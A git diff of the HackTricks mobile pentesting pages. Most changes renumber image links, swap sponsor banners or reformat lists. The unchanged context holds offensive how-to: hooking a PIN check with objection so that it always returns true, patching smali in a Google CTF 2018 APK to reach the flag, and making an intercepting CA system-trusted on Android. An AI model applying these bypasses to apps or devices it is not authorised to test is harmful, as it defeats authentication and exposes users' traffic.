 #### Hooking (watching) an entire class
 
@@ -209,17 +209,17 @@ android hooking watch class asvid.github.io.fridaapp.MainActivity --dump-args --
 
 If you play with the application while the class is hooked you will see when **each function is being called**, its **arguments** and the **return** value.
 
-![](<../../../.gitbook/assets/image (858).png>)
+![](<../../../.gitbook/assets/image (861).png>)
 
 #### Changing boolean return value of a function
 
 From the source code you can see that the function _checkPin_ gets a _String_ as argument and returns a _boolean_. Lets make the function **always return true**:
 
-![](<../../../.gitbook/assets/image (880).png>)
+![](<../../../.gitbook/assets/image (883).png>)
 
 Now, If you write anything in the text box for the PIN code you will see tat anything is valid:
 
-![](<../../../.gitbook/assets/image (225).png>)
+![](<../../../.gitbook/assets/image (228).png>)
 
 ### Class instances
 
@@ -229,7 +229,7 @@ Search for and print **live instances of a specific Java class**, specified by a
 android heap print_instances <class>
 ```
 
-![](<../../../.gitbook/assets/image (1092).png>)
+![](<../../../.gitbook/assets/image (1095).png>)
 
 ### Keystore/Intents
 
@@ -256,15 +256,15 @@ memory dump from_base <base_address> <size_to_dump> <local_destination> #Dump a
 memory list modules
 ```
 
-![](<../../../.gitbook/assets/image (283).png>)
+![](<../../../.gitbook/assets/image (286).png>)
 
 At the bottom os the list you can see frida:
 
-![](<../../../.gitbook/assets/image (1094).png>)
+![](<../../../.gitbook/assets/image (1097).png>)
 
 Lets checks what is frida exporting:
 
-![](<../../../.gitbook/assets/image (295).png>)
+![](<../../../.gitbook/assets/image (298).png>)
 
 #### Search/Write
 
diff --git a/mobile-pentesting/android-app-pentesting/google-ctf-2018-shall-we-play-a-game.md b/mobile-pentesting/android-app-pentesting/google-ctf-2018-shall-we-play-a-game.md
index ef8ebf57d..049539c7b 100644
--- a/mobile-pentesting/android-app-pentesting/google-ctf-2018-shall-we-play-a-game.md
+++ b/mobile-pentesting/android-app-pentesting/google-ctf-2018-shall-we-play-a-game.md
@@ -18,7 +18,7 @@ Download the APK here:
 
 I am going to upload the APK to [https://appetize.io/](https://appetize.io) (free account) to see how the apk is behaving:
 
-![](<../../.gitbook/assets/image (418).png>)
+![](<../../.gitbook/assets/image (421).png>)
 
 Looks like you need to win 1000000 times to get the flag.
 
@@ -26,7 +26,7 @@ Following the steps from [pentesting Android](./) you can decompile the applicat
 
 Reading the java code:
 
-![](<../../.gitbook/assets/image (492).png>)
+![](<../../.gitbook/assets/image (495).png>)
 
 It looks like the function that is going print the flag is **m().**
 
@@ -46,35 +46,35 @@ to:
  if-eq v0, v9, :cond_2 
 ```
 
-![Before](<../../.gitbook/assets/image (380).png>)
+![Before](<../../.gitbook/assets/image (383).png>)
 
-![After](<../../.gitbook/assets/image (835).png>)
+![After](<../../.gitbook/assets/image (838).png>)
 
 Follow the steps of [pentest Android](./) to recompile and sign the APK. Then, upload it to [https://appetize.io/](https://appetize.io) and lets see what happens:
 
-![](<../../.gitbook/assets/image (125).png>)
+![](<../../.gitbook/assets/image (128).png>)
 
 Looks like the flag is written without being completely decrypted. Probably the m() function should be called 1000000 times.
 
 **Other way** to do this is to not change the instrucction but change the compared instructions:
 
-![](<../../.gitbook/assets/image (837).png>)
+![](<../../.gitbook/assets/image (840).png>)
 
 **Another way** is instead of comparing with 1000000, set the value to 1 so this.o is compared with 1:
 
-![](<../../.gitbook/assets/image (626).png>)
+![](<../../.gitbook/assets/image (629).png>)
 
 A forth way is to add an instruction to move to value of v9(1000000) to v0 _(this.o)_:
 
-![](<../../.gitbook/assets/image (411).png>)
+![](<../../.gitbook/assets/image (414).png>)
 
-![](<../../.gitbook/assets/image (421).png>)
+![](<../../.gitbook/assets/image (424).png>)
 
 ## Solution
 
 Make the application run the loop 100000 times when you win the first time. To do so, you only need to create the **:goto\_6** loop and make the application **jump there if `this.o`** does not value 100000:
 
-![](<../../.gitbook/assets/image (1087).png>)
+![](<../../.gitbook/assets/image (1090).png>)
 
 You need to do this inside a physical device as (I don't know why) this doesn't work in an emulated device.
 
diff --git a/mobile-pentesting/android-app-pentesting/install-burp-certificate.md b/mobile-pentesting/android-app-pentesting/install-burp-certificate.md
index bd3d89bc9..6a80e90ae 100644
--- a/mobile-pentesting/android-app-pentesting/install-burp-certificate.md
+++ b/mobile-pentesting/android-app-pentesting/install-burp-certificate.md
@@ -14,11 +14,10 @@ Other ways to support HackTricks:
 
 </details>
 
-<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
+<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
 
 {% embed url="https://websec.nl/" %}
 
-
 ## On a Virtual Machine
 
 First of all you need to download the Der certificate from Burp. You can do this in _**Proxy**_ --> _**Options**_ --> _**Import / Export CA certificate**_
@@ -59,19 +58,19 @@ Explained in [**this video**](https://www.youtube.com/watch?v=qQicUW0svB8) you n
 
 1. **Install a CA certificate**: Just **drag\&drop** the DER Burp certificate **changing the extension** to `.crt` in the mobile so it's stored in the Downloads folder and go to `Install a certificate` -> `CA certificate`
 
-<figure><img src="../../.gitbook/assets/image (50).png" alt="" width="164"><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (53).png" alt="" width="164"><figcaption></figcaption></figure>
 
 * Check that the certificate was correctly stored going to `Trusted credentials` -> `USER`
 
-<figure><img src="../../.gitbook/assets/image (51).png" alt="" width="334"><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (54).png" alt="" width="334"><figcaption></figcaption></figure>
 
 2. **Make it System trusted**: Download the Magisc module [MagiskTrustUserCerts](https://github.com/NVISOsecurity/MagiskTrustUserCerts) (a .zip file), **drag\&drop it** in the phone, go to the **Magics app** in the phone to the **`Modules`** section, click on **`Install from storage`**, select the `.zip` module and once installed **reboot** the phone:
 
-<figure><img src="../../.gitbook/assets/image (52).png" alt="" width="345"><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (55).png" alt="" width="345"><figcaption></figcaption></figure>
 
 * After rebooting, go to `Trusted credentials` -> `SYSTEM` and check the Postswigger cert is there
 
-<figure><img src="../../.gitbook/assets/image (53).png" alt="" width="314"><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (56).png" alt="" width="314"><figcaption></figcaption></figure>
 
 ## Post Android 14
 
@@ -170,7 +169,7 @@ nsenter --mount=/proc/$APP_PID/ns/mnt -- /bin/mount --bind /system/etc/security/
 
 * [https://httptoolkit.com/blog/android-14-install-system-ca-certificate/](https://httptoolkit.com/blog/android-14-install-system-ca-certificate/)
 
-<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
+<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
 
 {% embed url="https://websec.nl/" %}
 
diff --git a/mobile-pentesting/android-app-pentesting/reversing-native-libraries.md b/mobile-pentesting/android-app-pentesting/reversing-native-libraries.md
index 858105a10..b0ea16a0b 100644
--- a/mobile-pentesting/android-app-pentesting/reversing-native-libraries.md
+++ b/mobile-pentesting/android-app-pentesting/reversing-native-libraries.md
@@ -9,14 +9,14 @@ Other ways to support HackTricks:
 * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
 * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
 
 </details>
 
 ### [WhiteIntel](https://whiteintel.io)
 
-<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (1227).png" alt=""><figcaption></figcaption></figure>
 
 [**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
 
@@ -26,55 +26,50 @@ You can check their website and try their engine for **free** at:
 
 {% embed url="https://whiteintel.io" %}
 
----
+***
 
-**For further information check: [https://maddiestone.github.io/AndroidAppRE/reversing\_native\_libs.html](https://maddiestone.github.io/AndroidAppRE/reversing\_native\_libs.html)**
+**For further information check:** [**https://maddiestone.github.io/AndroidAppRE/reversing\_native\_libs.html**](https://maddiestone.github.io/AndroidAppRE/reversing\_native\_libs.html)
 
 Android apps can use native libraries, typically written in C or C++, for performance-critical tasks. Malware creators also use these libraries, as they're harder to reverse engineer than DEX bytecode. The section emphasizes reverse engineering skills tailored to Android, rather than teaching assembly languages. ARM and x86 versions of libraries are provided for compatibility.
 
 ### Key Points:
-- **Native Libraries in Android Apps:**
-  - Used for performance-intensive tasks.
-  - Written in C or C++, making reverse engineering challenging.
-  - Found in `.so` (shared object) format, similar to Linux binaries.
-  - Malware creators prefer native code to make analysis harder.
 
-- **Java Native Interface (JNI) & Android NDK:**
-  - JNI allows Java methods to be implemented in native code.
-  - NDK is an Android-specific set of tools to write native code.
-  - JNI and NDK bridge Java (or Kotlin) code with native libraries.
-
-- **Library Loading & Execution:**
-  - Libraries are loaded into memory using `System.loadLibrary` or `System.load`.
-  - JNI_OnLoad is executed upon library loading.
-  - Java-declared native methods link to native functions, enabling execution.
-
-- **Linking Java Methods to Native Functions:**
-  - **Dynamic Linking:** Function names in native libraries match a specific pattern, allowing automatic linking.
-  - **Static Linking:** Uses `RegisterNatives` for linking, providing flexibility in function naming and structure.
-
-- **Reverse Engineering Tools and Techniques:**
-  - Tools like Ghidra and IDA Pro help analyze native libraries.
-  - `JNIEnv` is crucial for understanding JNI functions and interactions.
-  - Exercises are provided to practice loading libraries, linking methods, and identifying native functions.
+* **Native Libraries in Android Apps:**
+  * Used for performance-intensive tasks.
+  * Written in C or C++, making reverse engineering challenging.
+  * Found in `.so` (shared object) format, similar to Linux binaries.
+  * Malware creators prefer native code to make analysis harder.
+* **Java Native Interface (JNI) & Android NDK:**
+  * JNI allows Java methods to be implemented in native code.
+  * NDK is an Android-specific set of tools to write native code.
+  * JNI and NDK bridge Java (or Kotlin) code with native libraries.
+* **Library Loading & Execution:**
+  * Libraries are loaded into memory using `System.loadLibrary` or `System.load`.
+  * JNI\_OnLoad is executed upon library loading.
+  * Java-declared native methods link to native functions, enabling execution.
+* **Linking Java Methods to Native Functions:**
+  * **Dynamic Linking:** Function names in native libraries match a specific pattern, allowing automatic linking.
+  * **Static Linking:** Uses `RegisterNatives` for linking, providing flexibility in function naming and structure.
+* **Reverse Engineering Tools and Techniques:**
+  * Tools like Ghidra and IDA Pro help analyze native libraries.
+  * `JNIEnv` is crucial for understanding JNI functions and interactions.
+  * Exercises are provided to practice loading libraries, linking methods, and identifying native functions.
 
 ### Resources:
-- **Learning ARM Assembly:**
-  - Suggested for a deeper understanding of the underlying architecture.
-  - [ARM Assembly Basics](https://azeria-labs.com/writing-arm-assembly-part-1/) from Azeria Labs is recommended.
-
-- **JNI & NDK Documentation:**
-  - [Oracle's JNI Specification](https://docs.oracle.com/javase/7/docs/technotes/guides/jni/spec/jniTOC.html)
-  - [Android's JNI Tips](https://developer.android.com/training/articles/perf-jni)
-  - [Getting Started with the NDK](https://developer.android.com/ndk/guides/)
-
-- **Debugging Native Libraries:**
-  - [Debug Android Native Libraries Using JEB Decompiler](https://medium.com/@shubhamsonani/how-to-debug-android-native-libraries-using-jeb-decompiler-eec681a22cf3)
 
+* **Learning ARM Assembly:**
+  * Suggested for a deeper understanding of the underlying architecture.
+  * [ARM Assembly Basics](https://azeria-labs.com/writing-arm-assembly-part-1/) from Azeria Labs is recommended.
+* **JNI & NDK Documentation:**
+  * [Oracle's JNI Specification](https://docs.oracle.com/javase/7/docs/technotes/guides/jni/spec/jniTOC.html)
+  * [Android's JNI Tips](https://developer.android.com/training/articles/perf-jni)
+  * [Getting Started with the NDK](https://developer.android.com/ndk/guides/)
+* **Debugging Native Libraries:**
+  * [Debug Android Native Libraries Using JEB Decompiler](https://medium.com/@shubhamsonani/how-to-debug-android-native-libraries-using-jeb-decompiler-eec681a22cf3)
 
 ### [WhiteIntel](https://whiteintel.io)
 
-<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (1227).png" alt=""><figcaption></figcaption></figure>
 
 [**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
 
@@ -93,7 +88,7 @@ Other ways to support HackTricks:
 * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
 * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
 
 </details>
diff --git a/mobile-pentesting/android-app-pentesting/tapjacking.md b/mobile-pentesting/android-app-pentesting/tapjacking.md
index e37b8bfd2..4505ac2eb 100644
--- a/mobile-pentesting/android-app-pentesting/tapjacking.md
+++ b/mobile-pentesting/android-app-pentesting/tapjacking.md
@@ -14,7 +14,7 @@ Other ways to support HackTricks:
 
 </details>
 
-<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
+<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
 
 {% embed url="https://websec.nl/" %}
 
@@ -79,7 +79,7 @@ The mitigation is relatively simple as the developer may choose not to receive t
 >
 > To enable touch filtering, call [`setFilterTouchesWhenObscured(boolean)`](https://developer.android.com/reference/android/view/View#setFilterTouchesWhenObscured%28boolean%29) or set the android:filterTouchesWhenObscured layout attribute to true. When enabled, the framework will discard touches that are received whenever the view's window is obscured by another visible window. As a result, the view will not receive touches whenever a toast, dialog or other window appears above the view's window.
 
-<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
+<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
 
 {% embed url="https://websec.nl/" %}
 
diff --git a/mobile-pentesting/android-app-pentesting/webview-attacks.md b/mobile-pentesting/android-app-pentesting/webview-attacks.md
index 602f40aab..86a82313e 100644
--- a/mobile-pentesting/android-app-pentesting/webview-attacks.md
+++ b/mobile-pentesting/android-app-pentesting/webview-attacks.md
@@ -20,7 +20,7 @@ Other ways to support HackTricks:
 
 A critical aspect of Android development involves the correct handling of WebViews. This guide highlights key configurations and security practices to mitigate risks associated with WebView usage.
 
-![WebView Example](<../../.gitbook/assets/image (1187).png>)
+![WebView Example](<../../.gitbook/assets/image (1190).png>)
 
 ### **File Access in WebViews**
 
@@ -60,7 +60,7 @@ Ofc, a potential attacker should never be able to **control the URL** that an ap
 * **JavaScript**: Disabled by default in WebViews, it can be enabled via `setJavaScriptEnabled()`. Caution is advised as enabling JavaScript without proper safeguards can introduce security vulnerabilities.
 * **Intent Scheme**: WebViews can handle the `intent` scheme, potentially leading to exploits if not carefully managed. An example vulnerability involved an exposed WebView parameter "support\_url" that could be exploited to execute cross-site scripting (XSS) attacks.
 
-![Vulnerable WebView](<../../.gitbook/assets/image (1188).png>)
+![Vulnerable WebView](<../../.gitbook/assets/image (1191).png>)
 
 Exploitation example using adb:
 
diff --git a/mobile-pentesting/ios-pentesting-checklist.md b/mobile-pentesting/ios-pentesting-checklist.md
index 50a428e39..a93855bd9 100644
--- a/mobile-pentesting/ios-pentesting-checklist.md
+++ b/mobile-pentesting/ios-pentesting-checklist.md
@@ -1,6 +1,6 @@
 # iOS Pentesting Checklist
 
-<figure><img src="../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
 
 \
 Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -138,7 +138,7 @@ Other ways to support HackTricks:
 
 </details>
 
-<figure><img src="../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
 
 \
 Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
diff --git a/mobile-pentesting/ios-pentesting/README.md b/mobile-pentesting/ios-pentesting/README.md
index 6e33c4bdc..93d6afbf2 100644
--- a/mobile-pentesting/ios-pentesting/README.md
+++ b/mobile-pentesting/ios-pentesting/README.md
@@ -1,12 +1,12 @@
 # iOS Pentesting
 
-<figure><img src="../../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
 
 \
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=ios-pentesting) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
 Get Access Today:
 
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=ios-pentesting" %}
 
 <details>
 
@@ -394,13 +394,13 @@ struct CGSize {
 
 However, the best options to disassemble the binary are: [**Hopper**](https://www.hopperapp.com/download.html?) and [**IDA**](https://www.hex-rays.com/products/ida/support/download\_freeware/).
 
-<figure><img src="../../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
 
 \
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=ios-pentesting) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
 Get Access Today:
 
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=ios-pentesting" %}
 
 ## Data Storage
 
@@ -718,13 +718,13 @@ Followed by commands to observe log activities, which can be invaluable for diag
 
 ***
 
-<figure><img src="../../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
 
 \
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=ios-pentesting) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
 Get Access Today:
 
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=ios-pentesting" %}
 
 ## Backups
 
@@ -1199,13 +1199,13 @@ otool -L <application_path>
 * [https://github.com/authenticationfailure/WheresMyBrowser.iOS](https://github.com/authenticationfailure/WheresMyBrowser.iOS)
 * [https://github.com/nabla-c0d3/ssl-kill-switch2](https://github.com/nabla-c0d3/ssl-kill-switch2)
 
-<figure><img src="../../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
 
 \
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=ios-pentesting) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
 Get Access Today:
 
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=ios-pentesting" %}
 
 <details>
 
diff --git a/mobile-pentesting/ios-pentesting/burp-configuration-for-ios.md b/mobile-pentesting/ios-pentesting/burp-configuration-for-ios.md
index 64ca635b2..0fcfd55e1 100644
--- a/mobile-pentesting/ios-pentesting/burp-configuration-for-ios.md
+++ b/mobile-pentesting/ios-pentesting/burp-configuration-for-ios.md
@@ -14,13 +14,13 @@ Other ways to support HackTricks:
 
 </details>
 
-<figure><img src="../../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
 
 \
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=burp-configuration-for-ios) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
 Get Access Today:
 
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=burp-configuration-for-ios" %}
 
 ## Installing the Burp Certificate on iOS Devices
 
@@ -79,13 +79,13 @@ Starting device <UDID> [SUCCEEDED] with interface rvi0
 
 In _Proxy_ --> _Options_ --> _Export CA certificate_ --> _Certificate in DER format_
 
-![](<../../.gitbook/assets/image (531).png>)
+![](<../../.gitbook/assets/image (534).png>)
 
 * **Drag and Drop** the certificate inside the Emulator
 * **Inside the emulator** go to _Settings_ --> _General_ --> _Profile_ --> _PortSwigger CA_, and **verify the certificate**
 * **Inside the emulator** go to _Settings_ --> _General_ --> _About_ --> _Certificate Trust Settings_, and **enable PortSwigger CA**
 
-![](<../../.gitbook/assets/image (1045).png>)
+![](<../../.gitbook/assets/image (1048).png>)
 
 **Congrats, you have successfully configured the Burp CA Certificate in the iOS simulator**
 
@@ -101,17 +101,17 @@ Steps to configure Burp as proxy:
 * In _Proxies_ tab mark _Web Proxy (HTTP)_ and _Secure Web Proxy (HTTPS)_
 * In both options configure _127.0.0.1:8080_
 
-![](<../../.gitbook/assets/image (428).png>)
+![](<../../.gitbook/assets/image (431).png>)
 
 * Click on _**Ok**_ and the in _**Apply**_
 
-<figure><img src="../../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
 
 \
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=burp-configuration-for-ios) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
 Get Access Today:
 
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=burp-configuration-for-ios" %}
 
 <details>
 
diff --git a/mobile-pentesting/ios-pentesting/frida-configuration-in-ios.md b/mobile-pentesting/ios-pentesting/frida-configuration-in-ios.md
index 9bec30c20..ce5287e02 100644
--- a/mobile-pentesting/ios-pentesting/frida-configuration-in-ios.md
+++ b/mobile-pentesting/ios-pentesting/frida-configuration-in-ios.md
@@ -16,7 +16,7 @@ Other ways to support HackTricks:
 
 ### [WhiteIntel](https://whiteintel.io)
 
-<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (1227).png" alt=""><figcaption></figcaption></figure>
 
 [**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
 
@@ -26,7 +26,7 @@ You can check their website and try their engine for **free** at:
 
 {% embed url="https://whiteintel.io" %}
 
----
+***
 
 ## Installing Frida
 
@@ -87,7 +87,7 @@ frida-trace -U -W <if-plugin-bin> -m '*[* *]'
 
 * Auto complete: Just execute `frida -U <program>`
 
-<figure><img src="../../.gitbook/assets/image (1156).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (1159).png" alt=""><figcaption></figcaption></figure>
 
 * Get **all** available **classes** (filter by string)
 
@@ -391,10 +391,9 @@ iOS only stores 25 crashes of the same app, so you need to clean that or iOS wil
 
 * [https://www.briskinfosec.com/blogs/blogsdetail/Getting-Started-with-Frida](https://www.briskinfosec.com/blogs/blogsdetail/Getting-Started-with-Frida)
 
-
 ### [WhiteIntel](https://whiteintel.io)
 
-<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (1227).png" alt=""><figcaption></figcaption></figure>
 
 [**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
 
@@ -404,7 +403,6 @@ You can check their website and try their engine for **free** at:
 
 {% embed url="https://whiteintel.io" %}
 
-
 <details>
 
 <summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
diff --git a/mobile-pentesting/ios-pentesting/ios-testing-environment.md b/mobile-pentesting/ios-pentesting/ios-testing-environment.md
index 6ad48d6f0..ceab49e18 100644
--- a/mobile-pentesting/ios-pentesting/ios-testing-environment.md
+++ b/mobile-pentesting/ios-pentesting/ios-testing-environment.md
@@ -44,9 +44,9 @@ The simulator files can be found in `/Users/<username>/Library/Developer/CoreSim
 To open the simulator, run Xcode, then press in the _Xcode tab_ --> _Open Developer tools_ --> _Simulator_\
 \_\_In the following image clicking in "iPod touch \[...]" you can select other device to test in:
 
-![](<../../.gitbook/assets/image (267).png>)
+![](<../../.gitbook/assets/image (270).png>)
 
-![](<../../.gitbook/assets/image (517).png>)
+![](<../../.gitbook/assets/image (520).png>)
 
 ### Applications in the Simulator
 
diff --git a/mobile-pentesting/ios-pentesting/ios-uipasteboard.md b/mobile-pentesting/ios-pentesting/ios-uipasteboard.md
index 79c73686f..5714f62cc 100644
--- a/mobile-pentesting/ios-pentesting/ios-uipasteboard.md
+++ b/mobile-pentesting/ios-pentesting/ios-uipasteboard.md
@@ -14,7 +14,7 @@ Other ways to support HackTricks:
 
 </details>
 
-<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
+<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
 
 {% embed url="https://websec.nl/" %}
 
@@ -84,7 +84,7 @@ setInterval(function () {
 * [https://hackmd.io/@robihamanto/owasp-robi](https://hackmd.io/@robihamanto/owasp-robi)
 * [https://mas.owasp.org/MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0073/](https://mas.owasp.org/MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0073/)
 
-<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
+<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
 
 {% embed url="https://websec.nl/" %}
 
diff --git a/network-services-pentesting/1026-pentesting-rusersd.md b/network-services-pentesting/1026-pentesting-rusersd.md
index 857cfc392..d8bb6c778 100644
